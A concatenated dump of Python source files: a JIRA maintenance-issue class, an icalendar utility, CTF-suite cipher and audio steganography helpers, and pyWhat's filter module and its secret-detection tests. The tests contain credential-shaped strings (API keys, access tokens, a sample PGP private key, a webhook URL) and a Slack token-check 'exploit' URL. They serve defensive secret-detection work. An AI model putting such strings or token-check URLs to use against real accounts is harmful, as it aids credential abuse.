self.issuetype = issuetype
self.finished_transition = finished_transition
self.watchers = watchers
self.pri_mapping = pri_mapping
def exists(self):
"""Return bool for whether maintenance issue exists for this event
Improvements: Currently not handling the case where multiple issues are
returned which may hint that the key used isn't unique enough or people
have manually added the same label to other things. Also no exception
handling mostly because the exception return by JIRA is pretty
descriptive
Returns:
exists (bool)
"""
existing = self.jira.search_issues('labels = {}'.format(self.key))
if existing:
self.ticket = existing[0]
return True if existing else False
def create(self):
"""Create issue for event
Pre-check factors such as chehcking if this is a duplicate. If so, stop
further actions.
Returns:
success (bool)
"""
jira = self.jira
# If issue doesn't exist, create it. Else return False for inability
# Add watchers to the new ticket
if not self.exists():
options = {
'project': self.project,
'summary': self.title,
'labels': [self.key],
'description': self.body,
'issuetype': {'name': self.issuetype},
'priority': self.pri_mapping[self.impact],
}
new_issue = jira.create_issue(fields=options)
self.ticket = new_issue
[self._add_watcher(new_issue, w) for w in self.watchers]
return True
else:
return False
def close(self):
"""Return bool representing success or failure for closing issue
If issue doesn't exist, will return False because it can't close.
Returns:
success (bool)
"""
jira = self.jira
finished_transition = self.finished_transition
if self.exists():
# Fetch the transitions that we can put the current issue into.
# Search through these for the provided ``finished_transition``
# from init. If not found, raise error.
tkt = self.ticket
transitions = jira.transitions(tkt)
transition_ids = [
t['id'] for t in transitions
if t['name'] == self.finished_transition
]
if not transition_ids:
raise ValueError(
'Transition "{}" not found'.format(finished_transition)
)
t = transition_ids[0]
jira.transition_issue(tkt, t)
else:
return False
def _add_watcher(self, issue, watcher):
"""Add watcher to issue"""
self.jira.add_watcher(issue, watcher)
```
#### File: maint-notification/xmaintnote/util.py
```python
import json
import icalendar
def encode_vDDDTypes(obj):
"""Convert vDDDTypes - date/time types to strings."""
if isinstance(obj, icalendar.prop.vDDDTypes):
return obj.to_ical()
raise TypeError(repr(obj) + " is not JSON serializable")
def ical2json(cal):
data = {cal.name: dict(cal.items())}
for component in cal.subcomponents:
if component.name not in data[cal.name]:
data[cal.name][component.name] = []
comp_obj = {}
for item in component.items():
comp_obj[item[0]] = item[1]
data[cal.name][component.name].append(comp_obj)
return json.dumps(data, default=encode_vDDDTypes, sort_keys=True, indent=4)
def display(cal):
return cal.to_ical().decode().replace('\r\n', '\n').strip()
def register_property(property_type):
property_name = property_type.property_name
icalendar.cal.types_factory[property_name] = property_type
icalendar.cal.types_factory.types_map[property_name] = property_name
return property_type
``` |
{
"source": "0xmmalik/CTF-Suite",
"score": 4
} |
#### File: CTF-Suite/crypto/a1z26.py
```python
ALPHA = "abcdefghijklmnopqrstuvwxyz"
def encode(plaintext, delimiter='-'):
"""for alpha characters only"""
ciphertext = ""
plaintext = plaintext.lower()
for i in range(len(plaintext)):
ciphertext += str(ALPHA.index(plaintext[i]) + 1) + delimiter
ciphertext = ciphertext[:-1]
return ciphertext
def decode(ciphertext, delimiter):
"""for alpha characters only"""
plaintext = ""
ciphertext = ciphertext.split(delimiter)
for num in ciphertext:
plaintext += ALPHA[int(num) - 1]
return plaintext
```
#### File: CTF-Suite/foren/audsteg.py
```python
import wave
def get_lsb(filepath):
wv = wave.open(filepath, mode="rb")
wv_bytes = bytearray(list(wv.readframes(wv.getnframes())))
wv.close()
wv_lsb = [wv_bytes[i] & 1 for i in range(len(wv_bytes))]
extracted_bin = ''.join([str(x) for x in wv_lsb])
return ''.join(chr(int(extracted_bin[i:i + 8], 2)) for i in range(0, len(extracted_bin), 8))
def enc_lsb(filepath, message, outputfile):
wv = wave.open(filepath, mode="rb")
wv_bytes = bytearray(list(wv.readframes(wv.getnframes())))
bits = list(map(int, ''.join([bin(ord(i)).lstrip('0b').rjust(8, '0') for i in message])))
for i, bit in enumerate(bits):
wv_bytes[i] = (wv_bytes[i] & 254) | bit
wv_mod = bytes(wv_bytes)
with wave.open(outputfile, "wb") as new_wv:
new_wv.setparams(wv.getparams())
new_wv.writeframes(wv_mod)
wv.close()
return 0
``` |
{
"source": "0xmostafam/pyWhat",
"score": 3
} |
#### File: pyWhat/pywhat/filter.py
```python
from collections.abc import Mapping
from typing import Optional
from pywhat.helper import AvailableTags, CaseInsensitiveSet, InvalidTag, load_regexes
class Filter(Mapping):
"""
A filter is an object containing the filtration information.
The difference from Distribution object is
that Filter object does not store regexes.
Example filters:
* {"Tags": ["Networking"]}
* {"Tags": ["Identifiers"], "ExcludeTags": ["Credentials"], "MinRarity": 0.6}
"""
def __init__(self, filters_dict: Optional[Mapping] = None):
tags = CaseInsensitiveSet(AvailableTags().get_tags())
self._dict = dict()
if filters_dict is None:
filters_dict = {}
self._dict["Tags"] = CaseInsensitiveSet(filters_dict.setdefault("Tags", tags))
self._dict["ExcludeTags"] = CaseInsensitiveSet(
filters_dict.setdefault("ExcludeTags", set())
)
# We have regex with 0 rarity which trip false positive alarms all the time
self._dict["MinRarity"] = filters_dict.setdefault("MinRarity", 0.1)
self._dict["MaxRarity"] = filters_dict.setdefault("MaxRarity", 1)
if not self._dict["Tags"].issubset(tags) or not self._dict[
"ExcludeTags"
].issubset(tags):
raise InvalidTag("Passed filter contains tags that are not used by 'what'")
def get_filter(self):
return dict(self._dict)
def __repr__(self):
return f"{self.__class__.__name__}({self._dict})"
def __and__(self, other):
if type(self) != type(other):
return NotImplemented
tags = self._dict["Tags"] & other._dict["Tags"]
exclude_tags = self._dict["ExcludeTags"] & other._dict["ExcludeTags"]
min_rarity = max(self._dict["MinRarity"], other._dict["MinRarity"])
max_rarity = min(self._dict["MaxRarity"], other._dict["MaxRarity"])
return self.__class__(
{
"Tags": tags,
"ExcludeTags": exclude_tags,
"MinRarity": min_rarity,
"MaxRarity": max_rarity,
}
)
def __or__(self, other):
if type(self) != type(other):
return NotImplemented
tags = self._dict["Tags"] | other._dict["Tags"]
exclude_tags = self._dict["ExcludeTags"] | other._dict["ExcludeTags"]
min_rarity = min(self._dict["MinRarity"], other._dict["MinRarity"])
max_rarity = max(self._dict["MaxRarity"], other._dict["MaxRarity"])
return self.__class__(
{
"Tags": tags,
"ExcludeTags": exclude_tags,
"MinRarity": min_rarity,
"MaxRarity": max_rarity,
}
)
def __iand__(self, other):
if type(self) != type(other):
return NotImplemented
return self & other
def __ior__(self, other):
if type(self) != type(other):
return NotImplemented
return self | other
def __getitem__(self, key):
return self._dict[key]
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __contains__(self, item):
try:
return (
self["MinRarity"] <= item["Rarity"] <= self["MaxRarity"]
and set(item["Tags"]) & self["Tags"]
and not set(item["Tags"]) & self["ExcludeTags"]
)
except:
return False
def setdefault(self, key, default=None):
return self._dict.setdefault(key, default)
class Distribution(Filter):
"""
A distribution is an object containing the regex
But the regex has gone through a filter process.
Example filters:
* {"Tags": ["Networking"]}
* {"Tags": ["Identifiers"], "ExcludeTags": ["Credentials"], "MinRarity": 0.6}
"""
def __init__(self, filter: Optional[Filter] = None):
super().__init__(filter)
self._filter()
def _filter(self):
self._regexes = load_regexes()
temp_regexes = [regex for regex in self._regexes if regex in self]
self._regexes = temp_regexes
def get_regexes(self):
return list(self._regexes)
```
#### File: pyWhat/tests/test_regex_identifier.py
```python
import re
import pytest
from pywhat import regex_identifier
from pywhat.filter import Filter
from pywhat.helper import load_regexes
database = load_regexes()
r = regex_identifier.RegexIdentifier()
def _assert_match_first_item(name, res):
assert name in res[0]["Regex Pattern"]["Name"]
def _assert_match_exploit_first_item(search, res):
assert search in res[0]["Regex Pattern"]["Exploit"]
def test_regex_successfully_parses():
assert "Name" in r.distribution.get_regexes()[0]
def _assert_match_in_items(name, res):
assert any(name in i["Regex Pattern"]["Name"] for i in res)
@pytest.mark.skip(
reason="Not all regex have tests now, check https://github.com/bee-san/pyWhat/pull/146#issuecomment-927087231 for info."
)
def test_if_all_tests_exist():
with open("tests/test_regex_identifier.py", "r", encoding="utf-8") as file:
tests = file.read()
for regex in database:
assert (
regex["Name"] in tests
), "No test for this regex found in 'test_regex_identifier.py'. Note that a test needs to assert the whole name."
def test_regex_format():
for regex in database:
assert re.findall(
r"^(?:\(\?i\))?\^\(.*\)\$$", regex["Regex"]
), r"Please use ^(regex)$ regex format. If there is '\n' character, you have to escape it. If there is '(?i)', it is allowed and should be before the '^'."
assert (
re.findall(r"\^\||\|\^|\$\|\^|\$\||\|\$", regex["Regex"]) == []
), "Remove in-between boundaries. For example, '^|$' should only be '|'."
def test_sorted_by_rarity():
rarity_num = [regex["Rarity"] for regex in database]
assert rarity_num == sorted(
rarity_num, reverse=True
), "Regexes should be sorted by rarity in 'regex.json'. Regexes with rarity '1' are at the top of the file and '0' is at the bottom."
def test_dogecoin():
res = r.check(["DANHz6EQVoWyZ9rER56DwTXHWUxfkv9k2o"])
_assert_match_first_item("Dogecoin (DOGE) Wallet Address", res)
def test_url():
res = r.check(["tryhackme.com"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_url_2():
res = r.check(["http://username:[email protected]/"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_invalid_tld():
res = r.check(["tryhackme.comm"])
assert "Uniform Resource Locator (URL)" not in res
def test_https():
res = r.check(["hTTPs://tryhackme.com"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_lat_long():
res = r.check(["52.6169586, -1.9779857"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long2():
res = r.check(["53.76297,-1.9388732"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long3():
res = r.check(["77\u00B0 30' 29.9988\" N"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long4():
# degree symbol has to be a unicode character, otherwise Windows will not understand it
res = r.check(["N 32\u00B0 53.733 W 096\u00B0 48.358"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long5():
res = r.check(["41\u00B024'12.2\" N 2\u00B010'26.5\" E"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long6():
res = r.check(["40.741895,-73.989308"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_ip():
res = r.check(
["http://10.1.1.1/just/a/test"],
boundaryless=Filter({"Tags": ["Identifiers"]}),
)
_assert_match_first_item("Uniform Resource Locator (URL)", res)
assert "Internet Protocol (IP) Address Version 4" in res[1]["Regex Pattern"]["Name"]
def test_ip_not_url():
res = r.check(["http://10.1.1.1"])
assert "Uniform Resource Locator (URL)" not in res[0]
def test_ip2():
res = r.check(["192.0.2.235:80"])
assert "192.0.2.235:80" in res[0]["Matched"]
def test_ip3():
res = r.check(["2001:0db8:85a3:0000:0000:8a2e:0370:7334"])
_assert_match_first_item("Internet Protocol (IP) Address Version 6", res)
def test_ip4():
res = r.check(["[20fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b]:8080"])
assert "[2001:dbfdf8:f53e:61e4::18]:8080" in res[0]["Matched"]
def test_mac():
res = r.check(["00:00:00:00:00:00"])
assert (
res
and "00:00:00:00:00:00" in res[0]["Matched"]
and res[0]["Regex Pattern"]["Name"]
== "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
and "Xerox Corp" in res[0]["Regex Pattern"]["Description"]
)
def test_mac2():
res = r.check(["00-00-00-00-00-00"])
assert (
res
and "00-00-00-00-00-00" in res[0]["Matched"]
and res[0]["Regex Pattern"]["Name"]
== "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
and "Xerox Corp" in res[0]["Regex Pattern"]["Description"]
)
def test_mac3():
res = r.check(["0000.0000.0000"])
assert (
res
and "0000.0000.0000" in res[0]["Matched"]
and res[0]["Regex Pattern"]["Name"]
== "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
and "Xerox Corp" in res[0]["Regex Pattern"]["Description"]
)
def test_mac4():
res = r.check(["00-00-00-00.00-00"])
assert (
not res
or res[0]["Regex Pattern"]["Name"]
!= "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
)
def test_mac5():
res = r.check(["00:00-00-00-00-00"])
assert (
not res
or res[0]["Regex Pattern"]["Name"]
!= "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
)
def test_mac6():
res = r.check(["00:00:0G:00:00:00"])
assert (
not res
or res[0]["Regex Pattern"]["Name"]
!= "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
)
@pytest.mark.skip(
reason="Fails because not a valid TLD. If presented in punycode, it works."
)
def test_international_url():
res = r.check(["http://папироска.рф"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_same_international_url_in_punycode():
res = r.check(["https://xn--80aaxitdbjk.xn--p1ai/"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_ctf_flag():
res = r.check(["thm{hello}"])
_assert_match_first_item("TryHackMe Flag Format", res)
def test_ctf_flag_uppercase():
res = r.check(["FLAG{hello}"])
_assert_match_first_item("Capture The Flag (CTF) Flag", res)
def test_htb_flag():
res = r.check(["htb{just_a_test}"])
_assert_match_first_item("HackTheBox Flag Format", res)
def test_ethereum():
res = r.check(["0x52908400098527886E0F7030069857D2E4169EE7"])
_assert_match_first_item("Ethereum (ETH) Wallet Address", res)
def test_bitcoin_p2pkh():
res = r.check(["1KFHE7w8BhaENAswwryaoccDb6qcT6DbYY"])
_assert_match_first_item("Bitcoin (₿) Wallet Address", res)
def test_bitcoin_p2sh():
res = r.check(["3EmUH8Uh9EXE7axgyAeBsCc2vdUdKkDqWK"])
_assert_match_first_item("Bitcoin (₿) Wallet Address", res)
def test_bitcoin_bech32():
res = r.check(["bc1qj89046x7zv6pm4n00qgqp505nvljnfp6xfznyw"])
_assert_match_first_item("Bitcoin (₿) Wallet Address", res)
def test_monero():
res = r.check(
[
"<KEY>"
]
)
_assert_match_first_item("Monero (XMR) Wallet Address", res)
def test_litecoin():
res = r.check(["LRX8rSPVjifTxoLeoJtLf2JYdJFTQFcE7m"])
_assert_match_first_item("Litecoin (LTC) Wallet Address", res)
def test_visual_studio_token():
res = r.check(["<KEY>"])
_assert_match_in_items("Visual Studio App Center API Token", res)
def test_npm_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Node Package Manager (NPM) Token", res)
def test_bitly_secret_key():
res = r.check(["<KEY>"])
_assert_match_in_items("Bitly Secret Key", res)
def test_bitcoincash():
res = r.check(["bitcoincash:qzlg6uvceehgzgtz6phmvy8gtdqyt6vf359at4n3lq"])
_assert_match_first_item("Bitcoin Cash (BCH) Wallet Address", res)
def test_ripple():
res = r.check(["rBPAQmwMrt7FDDPNyjwFgwSqbWZPf6SLkk"])
_assert_match_first_item("Ripple (XRP) Wallet Address", res)
def test_visa():
res = r.check(["4111111111111111"])
_assert_match_first_item("Visa Card Number", res)
def test_visa_spaces():
res = r.check(["4607 0000 0000 0009"])
_assert_match_first_item("Visa Card Number", res)
def test_master_Card():
res = r.check(["5409010000000004"])
_assert_match_first_item("MasterCard Number", res)
assert "UNION NATIONAL BANK" in res[0]["Regex Pattern"]["Description"]
def test_master_card_spaces():
res = r.check(["5409 0100 0000 0004"])
_assert_match_first_item("MasterCard Number", res)
assert "UNION NATIONAL BANK" in res[0]["Regex Pattern"]["Description"]
def test_american_express():
res = r.check(["340000000000009"])
_assert_match_first_item("American Express Card Number", res)
def test_american_express_spaces():
res = r.check(["3714 4963 5398 431"])
_assert_match_first_item("American Express Card Number", res)
def test_american_diners_club():
res = r.check(["30000000000004"])
assert "Diners Club Card Number" in res[1]["Regex Pattern"]["Name"]
def test_american_diners_club_spaces():
res = r.check(["3056 9309 0259 04"])
_assert_match_first_item("Diners Club Card Number", res)
def test_discover_card():
res = r.check(["6011000000000004"])
_assert_match_first_item("Discover Card Number", res)
def test_discover_card_spaces():
res = r.check(["6011 1111 1111 1117"])
_assert_match_first_item("Discover Card Number", res)
def test_maestro_card():
res = r.check(["5038146401278870"])
_assert_match_first_item("Maestro Card Number", res)
def test_maestro_card_spaces():
res = r.check(["6759 6498 2643 8453"])
_assert_match_first_item("Maestro Card Number", res)
@pytest.mark.skip("Key:Value Pair is not ran by default because of low rarity.")
def test_username():
res = r.check(["james:S3cr37_P@$$W0rd"])
_assert_match_first_item("Key:Value Pair", res)
def test_email():
res = r.check(["<EMAIL>"])
_assert_match_first_item("Email Address", res)
def test_email2():
res = r.check(["<EMAIL>"])
_assert_match_first_item("Email Address", res)
def test_email3():
res = r.check(
["john.smith@[123.123.123.123]"],
boundaryless=Filter({"Tags": ["Identifiers"]}),
)
assert "Email Address" in res[2]["Regex Pattern"]["Name"]
def test_email4():
res = r.check(["<EMAIL>"])
assert "Email Address" not in res
def test_phone_number():
res = r.check(["202-555-0178"])
_assert_match_first_item("Phone Number", res)
def test_phone_number2():
res = r.check(["+1-202-555-0156"])
_assert_match_first_item("Phone Number", res)
assert "United States" in res[0]["Regex Pattern"]["Description"]
def test_phone_number3():
res = r.check(["+662025550156"])
_assert_match_first_item("Phone Number", res)
assert "Thailand" in res[0]["Regex Pattern"]["Description"]
def test_phone_number4():
res = r.check(["+356 202 555 0156"])
_assert_match_first_item("Phone Number", res)
assert "Malta" in res[0]["Regex Pattern"]["Description"]
def test_youtube():
res = r.check(["https://www.youtube.com/watch?v=ScOAntcCa78"])
_assert_match_first_item("YouTube Video", res)
def test_youtube2():
res = r.check(["http://www.youtube.com/watch?v=dQw4w9WgXcQ"])
_assert_match_first_item("YouTube Video", res)
def test_youtube_id():
res = r.check(["dQw4w9WgXcQ"])
_assert_match_first_item("YouTube Video ID", res)
def test_youtube_id2():
res = r.check(["078-05-1120"])
assert "YouTube Video ID" not in res
def test_youtube_channel_id():
res = r.check(["UCjXfkj5iapKHJrhYfAF9ZGg"])
_assert_match_first_item("YouTube Channel ID", res)
def test_ssn():
res = r.check(["001-01-0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn2():
res = r.check(["001:01:0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn3():
res = r.check(["001.01.0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn4():
res = r.check(["001 01 0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn5():
res = r.check(["900-01-2222"])
assert "American Social Security Number" not in str(res)
def test_ssn6():
res = r.check(["999-21-2222"])
assert "American Social Security Number" not in str(res)
def test_ssn7():
res = r.check(["666-21-2222"])
assert "American Social Security Number" not in str(res)
def test_ssn8():
res = r.check(["000-21-5544"])
assert "American Social Security Number" not in str(res)
def test_ssn9():
res = r.check(["122-00-5544"])
assert "American Social Security Number" not in str(res)
def test_ssn10():
res = r.check(["122-32-0000"])
assert "American Social Security Number" not in str(res)
def test_cors():
res = r.check(["Access-Control-Allow: *"])
_assert_match_first_item("Access-Control-Allow-Header", res)
def test_jwt():
res = r.check(
[
"<KEY>"
]
)
_assert_match_first_item("JSON Web Token (JWT)", res)
def test_s3():
res = r.check(["http://s3.amazonaws.com/bucket/"])
_assert_match_first_item("Amazon Web Services Simple Storage (AWS S3) URL", res)
def test_s3_internal():
res = r.check(["s3://bucket/path/key"])
_assert_match_first_item(
"Amazon Web Services Simple Storage (AWS S3) Internal URL", res
)
def test_s3_internal2():
res = r.check(["s3://bucket/path/directory/"])
_assert_match_first_item(
"Amazon Web Services Simple Storage (AWS S3) Internal URL", res
)
def test_arn():
res = r.check(["arn:partition:service:region:account-id:resource"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_arn2():
res = r.check(["arn:partition:service:region:account-id:resourcetype/resource"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_arn3():
res = r.check(["arn:partition:service:region:account-id:resourcetype:resource"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_arn4():
res = r.check(["arn:aws:s3:::my_corporate_bucket/Development/*"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_unix_timestamp():
res = r.check(["1577836800"]) # 2020-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Timestamp" in keys
assert "Recent Unix Timestamp" in keys
def test_unix_timestamp2():
res = r.check(["94694400"]) # 1973-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Timestamp" in keys
assert "Recent Unix Timestamp" not in keys
def test_unix_timestamp3():
res = r.check(["1234567"]) # 7 numbers
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Timestamp" not in keys
assert "Recent Unix Timestamp" not in keys
def test_unix_timestamp4():
res = r.check(["1577836800000"]) # 2020-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Millisecond Timestamp" in keys
assert "Recent Unix Millisecond Timestamp" in keys
def test_unix_timestamp5():
res = r.check(["94694400000"]) # 1973-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Millisecond Timestamp" in keys
assert "Recent Unix Millisecond Timestamp" not in keys
def test_ssh_rsa_key():
res = r.check(
[
"ssh-rsa A<KEY>x+5O9o0CtspkNmj/<KEY>cF4SUr20zHFoBoDQUtmvmBnWnKoGfpWXzuda449FVtmcrEjvBzCvCb3RStu0BbyOOybJagbKif3MkcYVO10pRbTveIUwgCD6F3ypD11XztoPNsgScmjme0sj/KWWNLyQkLWtpJEQ4k46745NAC5g+nP28TR2JM8doeqsxA8JovQkLWwDcR+WYZu2z/I8dfhOmalnoMRTJ2NzWDc0OSkKGYWjexR4fN6lAKCUOUptl9Nw== r00t@my-random_host"
]
)
_assert_match_first_item("SSH RSA Public Key", res)
def test_ssh_ecdsa_key():
res = r.check(
[
"ecdsa-sha2-nistp256 A<KEY>= r00t@my-random_host"
]
)
_assert_match_first_item("SSH ECDSA Public Key", res)
def test_ssh_ed25519_key():
res = r.check(
[
"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK0wmN/Cr3JXqmLW7u+g9pTh+wyqDHpSQEIQczXkVx9q r00t@my-random_host"
]
)
_assert_match_first_item("SSH ED25519 Public Key", res)
def test_aws_access_key():
res = r.check(["AKIAIOSFODNN7EXAMPLE"])
assert "Amazon Web Services Access Key" in str(res)
def test_aws_secret_access_key():
res = r.check(["<KEY>"])
assert "Amazon Web Services Secret Access Key" in str(res)
def test_aws_ec2_id():
res = r.check(["i-1234567890abcdef0"])
assert "Amazon Web Services EC2 Instance identifier" in str(res)
def test_aws_org_id():
res = r.check(["o-aa111bb222"])
assert "Amazon Web Services Organization identifier" in str(res)
def test_asin():
res = r.check(["B07ND5BB8V"])
_assert_match_first_item("Amazon Standard Identification Number (ASIN)", res)
def test_google_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("Google API Key", res)
def test_google_recaptcha_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("Google ReCaptcha API Key", res)
def test_google_oauth_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Google OAuth Token", res)
def test_aws_access_key_id():
res = r.check(["<KEY>"])
_assert_match_first_item("Amazon Web Services Access Key", res)
def test_mailgun_api_key():
res = r.check(["key-1e1631a9414aff7c262721e7b6ff6e43"])
_assert_match_first_item("Mailgun API Key", res)
def test_twilio_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("Twilio API Key", res)
def test_twilio_account_sid():
res = r.check(["AC10a133ffdfb112abb2d3f42d1d2d3b14"])
_assert_match_first_item("Twilio Account SID", res)
def test_twilio_application_sid():
res = r.check(["APfff01abd2b134a2aff3adc243ab211ab"])
_assert_match_first_item("Twilio Application SID", res)
def test_square_application_secret():
res = r.check(["<KEY>"])
_assert_match_first_item("Square Application Secret", res)
def test_square_access_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Square Access Token", res)
def test_stripe_api_key():
res = r.check(["sk_live_vHDDrL02ioRF5vYtyqiYBKma"])
_assert_match_first_item("Stripe API Key", res)
def test_github_access_token():
res = r.check(["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:<EMAIL>"])
_assert_match_first_item("GitHub Access Token", res)
def test_slack_api_key():
res = r.check(
["xoxp-<KEY>"]
)
_assert_match_first_item("Slack API Key", res)
_assert_match_exploit_first_item(
"https://slack.com/api/auth.test?token=<KEY>",
res,
)
def test_slack_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Slack Token", res)
_assert_match_exploit_first_item(
"https://slack.com/api/auth.test?token=<KEY>",
res,
)
def test_pgp_public_key():
res = r.check(
[
"-----BEGIN PGP PUBLIC KEY BLOCK-----Comment: Alice's OpenPGP certificateComment: https://www.ietf.org/id/draft-bre-openpgp-samples-01.htmlmDMEXEcE6RYJKwYBBAHaRw8BAQdArjWwk3FAqyiFbFBKT4TzXcVBqPTB3gmzlC/Ub7O1u120JkFsaWNlIExvdmVsYWNlIDxhbGljZUBvcGVucGdwLmV4YW1wbGU+iJAEExYIADgCGwMFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AWIQTrhbtfozp14V6UTmPyMVUMT0fjjgUCXaWfOgAKCRDyMVUMT0fjjukrAPoDnHBSogOmsHOsd9qGsiZpgRnOdypvbm+QtXZqth9rvwD9HcDC0tC+PHAsO7OTh1S1TC9RiJsvawAfCPaQZoed8gK4OARcRwTpEgorBgEEAZdVAQUBAQdAQv8GIa2rSTzgqbXCpDDYMiKRVitCsy203x3sE9+eviIDAQgHiHgEGBYIACAWIQTrhbtfozp14V6UTmPyMVUMT0fjjgUCXEcE6QIbDAAKCRDyMVUMT0fjjlnQAQDFHUs6TIcxrNTtEZFjUFm1M0PJ1Dng/cDW4xN80fsn0QEA22Kr7VkCjeAEC08VSTeV+QFsmz55/lntWkwYWhmvOgE==iIGO-----END PGP PUBLIC KEY BLOCK-----"
]
)
_assert_match_first_item("PGP Public Key", res)
def test_pgp_private_key():
res = r.check(
[
"-----BEGIN PGP PRIVATE KEY BLOCK-----Comment: Alice's OpenPGP Transferable Secret KeyComment: https://www.ietf.org/id/draft-bre-openpgp-samples-01.<KEY>9H444FAl2lnzoACgkQ8jFVDE9H447pKwD6A5xwUqIDprBzrHfahrImaYEZzncqb25vkLV2arYfa78A/R3AwtLQvjxwLDuzk4dUtUwvUYibL2sAHwj2kGaHnfICnF0EXEcE6RIKKwYBBAGXVQEFAQEHQEL/BiGtq0k84Km1wqQw2DIikVYrQrMttN8d7BPfnr4iAwEIBwAA/3/xFPG6U17rhTuq+07gmEvaFYKfxRB6sgAYiW6TMTpQEK6IeAQYFggAIBYhBOuFu1+jOnXhXpROY/IxVQxPR+OOBQJcRwTpAhsMAAoJEPIxVQxPR+OOWdABAMUdSzpMhzGs1O0RkWNQWbUzQ8nUOeD9wNbjE3zR+yfRAQDbYqvtWQKN4AQLTxVJN5X5AWybPnn+We1aTBhaGa86AQ===n8OM-----END PGP PRIVATE KEY BLOCK-----"
]
)
_assert_match_first_item("PGP Private Key", res)
def test_discord_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Discord Bot Token", res)
def test_discord_token_2():
res = r.check(["<KEY>"])
_assert_match_first_item("Discord Bot Token", res)
def test_discord_token_3():
res = r.check(["<KEY>"])
_assert_match_first_item("Discord Bot Token", res)
def test_bcglobal():
res = r.check(["6556123456789012"])
_assert_match_first_item("BCGlobal Card Number", res)
def test_carte_blanche():
res = r.check(["30137891521480"])
_assert_match_first_item("Carte Blanche Card Number", res)
def test_instapayment():
res = r.check(["6387849878080951"])
_assert_match_first_item("Insta Payment Card Number", res)
def test_instapayment():
res = r.check(["hawk.wz6bAoFDwcVQFCD9dofE.w2R1PWI8UTvEM4jd56XQ"])
_assert_match_first_item("StackHawk API Key", res)
def test_jcb_card():
res = r.check(["3537124887293334"])
_assert_match_first_item("JCB Card Number", res)
res = r.check(["3543824683332150682"])
_assert_match_first_item("JCB Card Number", res)
def test_switch_card():
res = r.check(["633341812811453789"])
_assert_match_first_item("Switch Card Number", res)
def test_korean_card():
res = r.check(["9837282929900015"])
_assert_match_first_item("Korean Local Card Number", res)
def test_laser_card():
res = r.check(["630495060000000000"])
_assert_match_first_item("Laser Card Number", res)
def test_solo_card():
res = r.check(["6334498823141663"])
_assert_match_first_item("Solo Card Number", res)
def test_github_personal_access_token():
res = r.check(["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"])
_assert_match_first_item("GitHub Personal Access Token", res)
def test_discord_webhook():
res = r.check(
[
"https://discord.com/api/webhooks/894893734582452235/KhNc2-_zwY9FfCAK0iGUa_KfYyW8m5Ja_5i-V24fEY6ETwvLLn-GmdT_vq0Do9-YRsij"
]
)
_assert_match_first_item("Discord Webhook", res)
def test_github_oauth_token():
res = r.check(["gho_<PASSWORD>"])
_assert_match_first_item("GitHub OAuth Access Token", res)
def test_github_refresh_token():
res = r.check(
[
"ghr_1B4a2e77838347a7E420ce178F2E7c6912E169246c34E1ccbF66C46812d16D5B1A9Dc86A1498"
]
)
_assert_match_first_item("GitHub Refresh Token", res)
def test_stripe_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("Stripe API Key", res)
def test_zapier_webhook():
res = r.check(["https://hooks.zapier.com/hooks/catch/1234567/f8f22dgg/"])
_assert_match_first_item("Zapier Webhook Token", res)
def test_new_relic_rest_api_key():
res = r.check(["NRRA-2a2d50d7d9449f3bb7ef65ac1184c488bd4fe7a8bd"])
_assert_match_first_item("New Relic REST API Key", res)
def test_new_relic_synthetics_api_key():
res = r.check(["NRSP-us010E1E3D1716F721FF39F726B3E4CBCB7"])
_assert_match_first_item("New Relic Synthetics Location Key", res)
def test_new_relic_user_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("New Relic User API Key", res)
def test_nano():
res = r.check(["nano_1c46rz7xnk98ozhzdjq7thwty844sgnqxk9496yysit1bnio1rcdzshc5ymn"])
_assert_match_first_item("Nano (NANO) Wallet Address", res)
def test_pypi_upload_token():
res = r.check(
[
"<KEY>"
]
)
_assert_match_first_item("PyPi Upload Token", res)
def test_turkish_car_plate():
res = r.check(["34A2344"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate2():
res = r.check(["34A23415"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate3():
res = r.check(["06BK123"])
